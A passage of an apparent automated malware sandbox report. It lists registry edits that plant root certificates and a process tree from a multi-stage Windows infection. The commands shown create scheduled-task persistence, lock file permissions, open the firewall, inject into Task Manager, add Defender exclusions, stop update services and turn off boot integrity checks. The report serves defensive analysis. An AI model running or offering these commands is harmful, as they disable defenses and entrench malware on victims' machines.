| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oneetx.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\oneetx.exe"
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
"C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "setup.exe" /f
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {AD812B81-F212-47D8-B785-2640B8481481} S-1-5-21-3518257231-2980324860-1431329550-1000:VWMLZJGN\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230702001509.log C:\Windows\Logs\CBS\CbsPersist_20230702001509.cab
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\taskeng.exe
taskeng.exe {8750CB4D-8FD1-4C47-BEFF-24F4B57F29B4} S-1-5-18:NT AUTHORITY\System:Service:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
